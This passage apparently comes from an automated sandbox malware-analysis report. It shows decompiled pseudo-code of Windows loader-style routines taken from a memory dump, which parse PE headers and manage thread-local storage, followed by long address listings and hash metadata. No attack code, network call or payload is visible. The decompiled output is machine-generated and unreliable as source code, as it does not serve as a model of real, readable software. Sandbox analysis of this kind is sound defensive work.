										_t208 = E01756B68(_v168,  &_v208, _v168, __eflags);
										__eflags = _t208 - 1;
										if(_t208 == 1) {
											goto L46;
										} else {
											__eflags = _v208 & 0x00000010;
											if((_v208 & 0x00000010) == 0) {
												goto L46;
											} else {
												_t342 = 4;
												_t366 = E01756AEB(_t355, 4,  &_v216);
												__eflags = _t366;
												if(_t366 >= 0) {
													goto L46;
												} else {
													asm("int 0x29");
													_t356 = 0;
													_v44 = 0;
													_t290 = _v52;
													__eflags = 0;
													if(0 == 0) {
														L108:
														_t356 = 0;
														_v44 = 0;
														goto L63;
													} else {
														__eflags = 0;
														if(0 < 0) {
															goto L108;
														}
														L63:
														_v112 = _t356;
														__eflags = _t356;
														if(_t356 == 0) {
															L143:
															_v8 = 0xfffffffe;
															_t211 = 0xc0000089;
														} else {
															_v36 = 0;
															_v60 = 0;
															_v48 = 0;
															_v68 = 0;
															_v44 = _t290 & 0xfffffffc;
															E016BE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
															_t306 = _v68;
															__eflags = _t306;
															if(_t306 == 0) {
																_t216 = 0xc000007b;
																_v36 = 0xc000007b;
																_t307 = _v60;
															} else {
																__eflags = _t290 & 0x00000001;
																if(__eflags == 0) {
																	_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																	__eflags = _t349 - 0x10b;
																	if(_t349 != 0x10b) {
																		__eflags = _t349 - 0x20b;
																		if(_t349 == 0x20b) {
																			goto L102;
																		} else {
																			_t307 = 0;
																			_v48 = 0;
																			_t216 = 0xc000007b;
																			_v36 = 0xc000007b;
																			goto L71;
																		}
																	} else {
																		L102:
																		_t307 =  *(_t306 + 0x50);
																		goto L69;
																	}
																	goto L151;
																} else {
																	_t239 = L016BEAEA(_t290, _t290, _t356, _t366, __eflags);
																	_t307 = _t239;
																	_v60 = _t307;
																	_v48 = _t307;
																	__eflags = _t307;
																	if(_t307 != 0) {
																		L70:
																		_t216 = _v36;
																	} else {
																		_push(_t239);
																		_push(0x14);
																		_push( &_v144);
																		_push(3);
																		_push(_v44);
																		_push(0xffffffff);
																		_t319 = E016E9730();
																		_v36 = _t319;
																		__eflags = _t319;
																		if(_t319 < 0) {
																			_t216 = 0xc000001f;
																			_v36 = 0xc000001f;
																			_t307 = _v60;
																		} else {
																			_t307 = _v132;
																			L69:
																			_v48 = _t307;
																			goto L70;
																		}
																	}
																}
															}
															L71:
															_v72 = _t307;
															_v84 = _t216;
															__eflags = _t216 - 0xc000007b;
															if(_t216 == 0xc000007b) {
																L150:
																_v8 = 0xfffffffe;
																_t211 = 0xc000007b;
															} else {
																_t344 = _t290 & 0xfffffffc;
																_v76 = _t344;
																__eflags = _v40 - _t344;
																if(_v40 <= _t344) {
																	goto L150;
																} else {
																	__eflags = _t307;
																	if(_t307 == 0) {
																		L75:
																		_t217 = 0;
																		_v104 = 0;
																		__eflags = _t366;
																		if(_t366 != 0) {
																			__eflags = _t290 & 0x00000001;
																			if((_t290 & 0x00000001) != 0) {
																				_t217 = 1;
																				_v104 = 1;
																			}
																			_t290 = _v44;
																			_v52 = _t290;
																		}
																		__eflags = _t217 - 1;
																		if(_t217 != 1) {
																			_t369 = 0;
																			_t218 = _v40;
																			goto L91;
																		} else {
																			_v64 = 0;
																			E016BE9C0(1, _t290, 0, 0,  &_v64);
																			_t309 = _v64;
																			_v108 = _t309;
																			__eflags = _t309;
																			if(_t309 == 0) {
																				goto L143;
																			} else {
																				_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																				__eflags = _t226 - 0x10b;
																				if(_t226 != 0x10b) {
																					__eflags = _t226 - 0x20b;
																					if(_t226 != 0x20b) {
																						goto L143;
																					} else {
																						_t371 =  *(_t309 + 0x98);
																						goto L83;
																					}
																				} else {
																					_t371 =  *(_t309 + 0x88);
																					L83:
																					__eflags = _t371;
																					if(_t371 != 0) {
																						_v80 = _t371 - _t356 + _t290;
																						_t310 = _v64;
																						_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																						_t292 =  *(_t310 + 6) & 0x0000ffff;
																						_t311 = 0;
																						__eflags = 0;
																						while(1) {
																							_v120 = _t311;
																							_v116 = _t348;
																							__eflags = _t311 - _t292;
																							if(_t311 >= _t292) {
																								goto L143;
																							}
																							_t359 =  *((intOrPtr*)(_t348 + 0xc));
																							__eflags = _t371 - _t359;
																							if(_t371 < _t359) {
																								L98:
																								_t348 = _t348 + 0x28;
																								_t311 = _t311 + 1;
																								continue;
																							} else {
																								__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																								if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																									goto L98;
																								} else {
																									__eflags = _t348;
																									if(_t348 == 0) {
																										goto L143;
																									} else {
																										_t218 = _v40;
																										_t312 =  *_t218;
																										__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																										if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																											_v100 = _t359;
																											_t360 = _v108;
																											_t372 = L016B8F44(_v108, _t312);
																											__eflags = _t372;
																											if(_t372 == 0) {
																												goto L143;
																											} else {
																												_t290 = _v52;
																												_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E016E3C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																												_t307 = _v72;
																												_t344 = _v76;
																												_t218 = _v40;
																												goto L91;
																											}
																										} else {
																											_t290 = _v52;
																											_t307 = _v72;
																											_t344 = _v76;
																											_t369 = _v80;
																											L91:
																											_t358 = _a4;
																											__eflags = _t358;
																											if(_t358 == 0) {
																												L95:
																												_t308 = _a8;
																												__eflags = _t308;
																												if(_t308 != 0) {
																													 *_t308 =  *((intOrPtr*)(_v40 + 4));
																												}
																												_v8 = 0xfffffffe;
																												_t211 = _v84;
																											} else {
																												_t370 =  *_t218 - _t369 + _t290;
																												 *_t358 = _t370;
																												__eflags = _t370 - _t344;
																												if(_t370 <= _t344) {
																													L149:
																													 *_t358 = 0;
																													goto L150;
																												} else {
																													__eflags = _t307;
																													if(_t307 == 0) {
																														goto L95;
																													} else {
																														__eflags = _t370 - _t344 + _t307;
																														if(_t370 >= _t344 + _t307) {
																															goto L149;
																														} else {
																															goto L95;
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																							goto L97;
																						}
																					}
																					goto L143;
																				}
																			}
																		}
																	} else {
																		__eflags = _v40 - _t307 + _t344;
																		if(_v40 >= _t307 + _t344) {
																			goto L150;
																		} else {
																			goto L75;
																		}
																	}
																}
															}
														}
														L97:
														 *[fs:0x0] = _v20;
														return _t211;
													}
												}
											}
										}
									} else {
										goto L46;
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}





































































































                                        0x016bd5f2
                                        0x016bd5f5
                                        0x016bd5f5
                                        0x016bd5fd
                                        0x016bd600
                                        0x016bd60a
                                        0x016bd60d
                                        0x016bd617
                                        0x016bd61d
                                        0x016bd627
                                        0x016bd62e
                                        0x016bd911
                                        0x016bd913
                                        0x00000000
                                        0x016bd919
                                        0x016bd919
                                        0x016bd919
                                        0x016bd634
                                        0x016bd634
                                        0x016bd634
                                        0x016bd634
                                        0x016bd640
                                        0x016bd8bf
                                        0x00000000
                                        0x016bd646
                                        0x016bd646
                                        0x016bd64d
                                        0x016bd652
                                        0x0170b2fc
                                        0x0170b2fc
                                        0x0170b302
                                        0x0170b33b
                                        0x0170b341
                                        0x00000000
                                        0x0170b304
                                        0x0170b304
                                        0x0170b319
                                        0x0170b31e
                                        0x0170b324
                                        0x0170b326
                                        0x0170b332
                                        0x0170b347
                                        0x0170b34c
                                        0x0170b351
                                        0x0170b35a
                                        0x00000000
                                        0x0170b328
                                        0x0170b328
                                        0x00000000
                                        0x0170b328
                                        0x0170b326
                                        0x016bd658
                                        0x016bd658
                                        0x016bd65b
                                        0x016bd665
                                        0x00000000
                                        0x016bd66b
                                        0x016bd66b
                                        0x016bd66b
                                        0x016bd66b
                                        0x016bd66d
                                        0x016bd672
                                        0x016bd67a
                                        0x00000000
                                        0x00000000
                                        0x016bd680
                                        0x016bd686
                                        0x016bd8ce
                                        0x016bd8d4
                                        0x016bd8dd
                                        0x016bd8e0
                                        0x016bd68c
                                        0x016bd691
                                        0x016bd69d
                                        0x016bd6a2
                                        0x016bd6a7
                                        0x016bd6b0
                                        0x016bd6b5
                                        0x016bd6e0
                                        0x016bd6b7
                                        0x016bd6b7
                                        0x016bd6b9
                                        0x016bd6b9
                                        0x016bd6bb
                                        0x016bd6bd
                                        0x016bd6ce
                                        0x016bd6d0
                                        0x016bd6d2
                                        0x0170b363
                                        0x0170b365
                                        0x00000000
                                        0x0170b36b
                                        0x00000000
                                        0x0170b36b
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x016bd6bf
                                        0x016bd6bf
                                        0x016bd6e5
                                        0x016bd6e7
                                        0x016bd6e9
                                        0x016bd6ec
                                        0x016bd6ec
                                        0x016bd6ef
                                        0x016bd6f5
                                        0x016bd6f9
                                        0x016bd6fb
                                        0x016bd6fd
                                        0x016bd701
                                        0x016bd703
                                        0x016bd70a
                                        0x016bd70a
                                        0x016bd701
                                        0x016bd710
                                        0x016bd710
                                        0x016bd6c1
                                        0x016bd6c1
                                        0x016bd6c6
                                        0x0170b36d
                                        0x0170b36f
                                        0x00000000
                                        0x0170b375
                                        0x0170b375
                                        0x0170b375
                                        0x00000000
                                        0x0170b375
                                        0x00000000
                                        0x016bd6cc
                                        0x016bd6d8
                                        0x016bd6d8
                                        0x016bd6d8
                                        0x00000000
                                        0x016bd6c6
                                        0x016bd6bf
                                        0x00000000
                                        0x016bd6da
                                        0x016bd6da
                                        0x016bd716
                                        0x016bd71b
                                        0x016bd720
                                        0x016bd726
                                        0x016bd726
                                        0x016bd72d
                                        0x00000000
                                        0x016bd733
                                        0x016bd739
                                        0x016bd742
                                        0x016bd750
                                        0x016bd758
                                        0x016bd764
                                        0x016bd776
                                        0x016bd77a
                                        0x016bd783
                                        0x016bd928
                                        0x016bd92c
                                        0x016bd93d
                                        0x016bd944
                                        0x016bd94f
                                        0x016bd954
                                        0x016bd956
                                        0x016bd95f
                                        0x016bd961
                                        0x016bd973
                                        0x016bd973
                                        0x016bd956
                                        0x016bd944
                                        0x016bd92c
                                        0x016bd78b
                                        0x0170b394
                                        0x016bd791
                                        0x016bd798
                                        0x0170b3a3
                                        0x0170b3bb
                                        0x0170b3bb
                                        0x016bd7a5
                                        0x016bd866
                                        0x016bd870
                                        0x016bd892
                                        0x016bd898
                                        0x016bd89e
                                        0x016bd8a0
                                        0x016bd8a6
                                        0x016bd8ac
                                        0x016bd8ae
                                        0x016bd8b4
                                        0x016bd8b4
                                        0x016bd8ae
                                        0x016bd7a5
                                        0x016bd78b
                                        0x016bd7b1
                                        0x0170b3c5
                                        0x0170b3c5
                                        0x016bd7c3
                                        0x016bd7ca
                                        0x016bd7e5
                                        0x016bd7eb
                                        0x016bd8eb
                                        0x016bd8ed
                                        0x00000000
                                        0x016bd8f3
                                        0x016bd8f3
                                        0x016bd8f3
                                        0x00000000
                                        0x016bd8ed
                                        0x016bd7cc
                                        0x016bd7cc
                                        0x016bd7d2
                                        0x00000000
                                        0x016bd7d4
                                        0x016bd7d4
                                        0x016bd7d7
                                        0x016bd7df
                                        0x0170b3d4
                                        0x0170b3d9
                                        0x0170b3dc
                                        0x0170b3dc
                                        0x0170b3df
                                        0x0170b3e2
                                        0x0170b468
                                        0x0170b46d
                                        0x0170b46f
                                        0x0170b46f
                                        0x0170b475
                                        0x016bd8f8
                                        0x016bd8f9
                                        0x016bd8fd
                                        0x0170b3e8
                                        0x0170b3e8
                                        0x0170b3eb
                                        0x0170b3ed
                                        0x00000000
                                        0x0170b3ef
                                        0x0170b3ef
                                        0x0170b3f1
                                        0x0170b3f4
                                        0x0170b3fe
                                        0x0170b404
                                        0x0170b409
                                        0x0170b40e
                                        0x0170b410
                                        0x0170b410
                                        0x0170b414
                                        0x0170b414
                                        0x0170b41b
                                        0x0170b420
                                        0x0170b423
                                        0x0170b425
                                        0x0170b427
                                        0x0170b42a
                                        0x0170b42d
                                        0x0170b42d
                                        0x0170b42a
                                        0x0170b432
                                        0x0170b436
                                        0x0170b438
                                        0x0170b43b
                                        0x0170b43b
                                        0x0170b449
                                        0x0170b44e
                                        0x0170b454
                                        0x0170b458
                                        0x0170b458
                                        0x0170b45d
                                        0x00000000
                                        0x0170b45d
                                        0x0170b3ed
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x016bd7df
                                        0x016bd7d2
                                        0x016bd7ca
                                        0x0170b37c
                                        0x0170b37e
                                        0x0170b385
                                        0x0170b38a
                                        0x00000000
                                        0x0170b38a
                                        0x016bd742
                                        0x016bd7f1
                                        0x016bd7f8
                                        0x0170b49b
                                        0x0170b49b
                                        0x016bd800
                                        0x016bd837
                                        0x016bd843
                                        0x016bd845
                                        0x016bd847
                                        0x016bd84a
                                        0x016bd84b
                                        0x016bd84e
                                        0x016bd857
                                        0x016bd818
                                        0x016bd824
                                        0x016bd831
                                        0x0170b4a5
                                        0x0170b4ab
                                        0x0170b4b3
                                        0x0170b4b8
                                        0x0170b4bb
                                        0x00000000
                                        0x0170b4c1
                                        0x0170b4c1
                                        0x0170b4c8
                                        0x00000000
                                        0x0170b4ce
                                        0x0170b4d4
                                        0x0170b4e1
                                        0x0170b4e3
                                        0x0170b4e5
                                        0x00000000
                                        0x0170b4eb
                                        0x0170b4f0
                                        0x0170b4f2
                                        0x016bdac9
                                        0x016bdacc
                                        0x016bdacf
                                        0x016bdad1
                                        0x016bdd78
                                        0x016bdd78
                                        0x016bdcf2
                                        0x00000000
                                        0x016bdad7
                                        0x016bdad9
                                        0x016bdadb
                                        0x00000000
                                        0x00000000
                                        0x016bdae1
                                        0x016bdae1
                                        0x016bdae4
                                        0x016bdae6
                                        0x0170b4f9
                                        0x0170b4f9
                                        0x0170b500
                                        0x016bdaec
                                        0x016bdaec
                                        0x016bdaf5
                                        0x016bdaf8
                                        0x016bdafb
                                        0x016bdb03
                                        0x016bdb11
                                        0x016bdb16
                                        0x016bdb19
                                        0x016bdb1b
                                        0x0170b52c
                                        0x0170b531
                                        0x0170b534
                                        0x016bdb21
                                        0x016bdb21
                                        0x016bdb24
                                        0x016bdcd9
                                        0x016bdce2
                                        0x016bdce5
                                        0x016bdd6a
                                        0x016bdd6d
                                        0x00000000
                                        0x016bdd73
                                        0x0170b51a
                                        0x0170b51c
                                        0x0170b51f
                                        0x0170b524
                                        0x00000000
                                        0x0170b524
                                        0x016bdce7
                                        0x016bdce7
                                        0x016bdce7
                                        0x00000000
                                        0x016bdce7
                                        0x00000000
                                        0x016bdb2a
                                        0x016bdb2c
                                        0x016bdb31
                                        0x016bdb33
                                        0x016bdb36
                                        0x016bdb39
                                        0x016bdb3b
                                        0x016bdb66
                                        0x016bdb66
                                        0x016bdb3d
                                        0x016bdb3d
                                        0x016bdb3e
                                        0x016bdb46
                                        0x016bdb47
                                        0x016bdb49
                                        0x016bdb4c
                                        0x016bdb53
                                        0x016bdb55
                                        0x016bdb58
                                        0x016bdb5a
                                        0x0170b50a
                                        0x0170b50f
                                        0x0170b512
                                        0x016bdb60
                                        0x016bdb60
                                        0x016bdb63
                                        0x016bdb63
                                        0x00000000
                                        0x016bdb63
                                        0x016bdb5a
                                        0x016bdb3b
                                        0x016bdb24
                                        0x016bdb69
                                        0x016bdb69
                                        0x016bdb6c
                                        0x016bdb6f
                                        0x016bdb74
                                        0x0170b557
                                        0x0170b557
                                        0x0170b55e
                                        0x016bdb7a
                                        0x016bdb7c
                                        0x016bdb7f
                                        0x016bdb82
                                        0x016bdb85
                                        0x00000000
                                        0x016bdb8b
                                        0x016bdb8b
                                        0x016bdb8d
                                        0x016bdb9b
                                        0x016bdb9b
                                        0x016bdb9d
                                        0x016bdba0
                                        0x016bdba2
                                        0x016bdba4
                                        0x016bdba7
                                        0x016bdba9
                                        0x016bdbae
                                        0x016bdbae
                                        0x016bdbb1
                                        0x016bdbb4
                                        0x016bdbb4
                                        0x016bdbb7
                                        0x016bdbba
                                        0x016bdcd2
                                        0x016bdcd4
                                        0x00000000
                                        0x016bdbc0
                                        0x016bdbc0
                                        0x016bdbd2
                                        0x016bdbd7
                                        0x016bdbda
                                        0x016bdbdd
                                        0x016bdbdf
                                        0x00000000
                                        0x016bdbe5
                                        0x016bdbe5
                                        0x016bdbee
                                        0x016bdbf1
                                        0x0170b541
                                        0x0170b544
                                        0x00000000
                                        0x0170b546
                                        0x0170b546
                                        0x00000000
                                        0x0170b546
                                        0x016bdbf7
                                        0x016bdbf7
                                        0x016bdbfd
                                        0x016bdbfd
                                        0x016bdbff
                                        0x016bdc0b
                                        0x016bdc15
                                        0x016bdc1b
                                        0x016bdc1d
                                        0x016bdc21
                                        0x016bdc21
                                        0x016bdc23
                                        0x016bdc23
                                        0x016bdc26
                                        0x016bdc29
                                        0x016bdc2b
                                        0x00000000
                                        0x00000000
                                        0x016bdc31
                                        0x016bdc34
                                        0x016bdc36
                                        0x016bdcbf
                                        0x016bdcbf
                                        0x016bdcc2
                                        0x00000000
                                        0x016bdc3c
                                        0x016bdc41
                                        0x016bdc43
                                        0x00000000
                                        0x016bdc45
                                        0x016bdc45
                                        0x016bdc47
                                        0x00000000
                                        0x016bdc4d
                                        0x016bdc4d
                                        0x016bdc50
                                        0x016bdc52
                                        0x016bdc55
                                        0x016bdcfa
                                        0x016bdcfe
                                        0x016bdd08
                                        0x016bdd0a
                                        0x016bdd0c
                                        0x00000000
                                        0x016bdd12
                                        0x016bdd15
                                        0x016bdd2d
                                        0x016bdd2f
                                        0x016bdd32
                                        0x016bdd35
                                        0x00000000
                                        0x016bdd35
                                        0x016bdc5b
                                        0x016bdc5b
                                        0x016bdc5e
                                        0x016bdc61
                                        0x016bdc64
                                        0x016bdc67
                                        0x016bdc67
                                        0x016bdc6a
                                        0x016bdc6c
                                        0x016bdc8e
                                        0x016bdc8e
                                        0x016bdc91
                                        0x016bdc93
                                        0x016bdcce
                                        0x016bdcce
                                        0x016bdc95
                                        0x016bdc9c
                                        0x016bdc6e
                                        0x016bdc72
                                        0x016bdc75
                                        0x016bdc77
                                        0x016bdc79
                                        0x0170b551
                                        0x0170b551
                                        0x00000000
                                        0x016bdc7f
                                        0x016bdc7f
                                        0x016bdc81
                                        0x00000000
                                        0x016bdc83
                                        0x016bdc86
                                        0x016bdc88
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x016bdc88
                                        0x016bdc81
                                        0x016bdc79
                                        0x016bdc6c
                                        0x016bdc55
                                        0x016bdc47
                                        0x016bdc43
                                        0x00000000
                                        0x016bdc36
                                        0x016bdc23
                                        0x00000000
                                        0x016bdbff
                                        0x016bdbf1
                                        0x016bdbdf
                                        0x016bdb8f
                                        0x016bdb92
                                        0x016bdb95
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x016bdb95
                                        0x016bdb8d
                                        0x016bdb85
                                        0x016bdb74
                                        0x016bdc9f
                                        0x016bdca2
                                        0x016bdcb0
                                        0x016bdcb0
                                        0x016bdad1
                                        0x0170b4e5
                                        0x0170b4c8
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x016bd831
                                        0x00000000
                                        0x016bd800
                                        0x0170b47f
                                        0x0170b485
                                        0x00000000
                                        0x0170b485
                                        0x016bd665
                                        0x016bd652
                                        0x00000000

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3e99ca6443054b8ede548f5dfda955045c2b170ecf4ae5caac8a40a7d02a3c4d
                                        • Instruction ID: 4b810d5d87e7c5ac0bb62b1503bcbc560983e965816d79429aedb49f3e0e4f8b
                                        • Opcode Fuzzy Hash: 3e99ca6443054b8ede548f5dfda955045c2b170ecf4ae5caac8a40a7d02a3c4d
                                        • Instruction Fuzzy Hash: BEE1B134A0035ACFEB35CF58CC94BF9B7B2BF45318F1541A9E9095B291D730AA86CB51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016B849B Relevance: .3, Instructions: 290COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 92%
                                        			E016B849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x177f9c0);
				E016FD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x1797b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E016BCEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E016C2280( *[fs:0x30], 0x1798550);
						_t139 =  *0x1797b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E016DF3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E016BFFB0(_t193, _t235, 0x1798550);
								L5:
								return E016FD130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E016A1C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x1797b9c; // 0x0
							_t235 = L016C4620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x1797b10; // 0x0
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E016DA61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E016BFFB0(_t193, _t235, 0x1798550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L016C77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L016C77F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x1797b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x1797b10; // 0x0
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E016E37C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x1797b9c; // 0x0
									_t214 = L016C4620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E016E37F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x1797b10 =  *0x1797b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x1797b04 =  *0x1797b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L016C77F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L016C77F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x1797b08 =  *0x1797b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E016E57C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E016EF3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L016C77F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E016DA44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L016C77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E016E96C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

































                                        0x016b849b
                                        0x016b849b
                                        0x016b849b
